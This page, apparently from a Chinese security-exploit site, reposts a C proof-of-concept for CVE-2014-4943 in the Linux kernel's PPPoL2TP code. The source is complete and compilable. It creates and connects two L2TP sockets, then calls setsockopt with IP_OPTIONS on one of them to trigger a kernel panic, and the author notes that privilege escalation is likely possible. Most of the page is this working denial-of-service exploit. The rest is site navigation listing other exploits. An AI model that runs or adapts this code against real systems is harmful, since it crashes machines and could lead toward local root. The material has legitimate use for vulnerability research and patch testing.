首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux CVE-2014-4943 Proof Of Concept
来源:www.sevagas.com 作者:Nasi 发布时间:2015-03-03  


/* ----------------------------------------------------------------------------------------------------
 * cve-2014-4943_poc.c
 *
 * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
 * differences between an l2tp socket and an inet socket.
 *
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
 * There are some kernel structures that can be overwriten but I didn't manage to find the ultimate trick to at least point back to userland.
 * If seems guys at immunuty found a way using race condition.
 *
 *
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c 
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
 

 
/* -----------------------   Includes ----------------------------*/

#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>


/* -----------------------   Definitions ----------------------------*/

#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"

 

/* -----------------------   functions ----------------------------*/


/**
 * It is possible to modify several parts of socket object using IP options frop UDP setsockopt
 * For this POC, IP_OPTIONS is the easiest way to panic kernel
 */
void modifyUDPvalues(int tunnel_fd)
{
/* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:
 
 int udp_setsockopt(struct sock *sk, int level, int optname,
                    char __user *optval, unsigned int optlen)
 {
         if (level == SOL_UDP  ||  level == SOL_UDPLITE)
                 return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                           udp_push_pending_frames);
         return ip_setsockopt(sk, level, optname, optval, optlen);
 }
*/
 
 int ip_options = 0x1;
    
 if (setsockopt(tunnel_fd, SOL_IP,  IP_OPTIONS, &ip_options, 20) == -1)
    {
        perror("setsockopt (IP_OPTIONS)");  
    }
}


/**
 * DOS poc for cve_2014_4943 vulnerability
 */
int main()
{

 int tunnel_fd;
 int tunnel_fd2;
 int udp_fd;

 printf("[cve_2014_4943]: Preparing to exploit.\n");

 /* Create first L2TP socket */
 tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
 if (tunnel_fd < 0)
 {
  perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
  return -1;
 }
 /* Create second L2TP socket */
 tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
 if (tunnel_fd2 < 0)
 {
  perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
  return -1;
 }
 if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
 {
  perror("cannot create socket");
  return -1;
 }
 
 /* Connect LT2P socket */
 struct sockaddr_pppol2tp sax;

 memset(&sax, 0, sizeof(sax));
 sax.sa_family = AF_PPPOX;
 sax.sa_protocol = PX_PROTO_OL2TP;
 sax.pppol2tp.fd = udp_fd;       /* fd of tunnel UDP socket */
 sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);// peer_addr->sin_addr.s_addr;
 sax.pppol2tp.addr.sin_port = htons(1337);//peer_addr->sin_port;
 sax.pppol2tp.addr.sin_family = AF_INET;
 sax.pppol2tp.s_tunnel = 8;//tunnel_id;
 sax.pppol2tp.s_session = 0;     /* special case: mgmt socket */
 sax.pppol2tp.d_tunnel = 0;
 sax.pppol2tp.d_session = 0;     /* special case: mgmt socket */

 if(connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax) ) < 0 )
 {
  perror("connect failed");
 }
 
 /* Connect LT2P socket */
 struct sockaddr_pppol2tp sax2;

 memset(&sax, 0, sizeof(sax2));
 sax2.sa_family = AF_PPPOX;
 sax2.sa_protocol = PX_PROTO_OL2TP;
 sax2.pppol2tp.s_tunnel = 8;//tunnel_id;
 sax2.pppol2tp.s_session = 1;    
 sax2.pppol2tp.d_tunnel = 0;
 sax2.pppol2tp.d_session = 1;    

 if(connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2) ) < 0 )
 {
  perror("connect failed");
 }
 
 
 /*
     * Entering critical part
     */
    printf("[cve_2014_4943]:  Panic!\n");
 
 //modifyUDPvalues(tunnel_fd);
 modifyUDPvalues(tunnel_fd2);

 
 // close opened socket 
 puts("\n [+] Closing sockets...");
 close(tunnel_fd);
 close(tunnel_fd2);
   
 exit(0);
}

 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux CVE-2014-3631 Proof Of C
·Linux CVE-2014-9322 Proof Of C
·Swiss File Knife 1.7.4 Buffer
·Seagate Business NAS Unauthent
·Solarwinds Orion AccountManage
·Symantec Web Gateway 5 restore
·Seagate Business NAS <= 2014.0
·SQLite3 3.8.6 - Controlled Mem
·Persistent Systems Client Auto
·HP Data Protector 8.10 Remote
·Jetty 9.2.8 Shared Buffer Leak
·Generic Web Application DLL In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved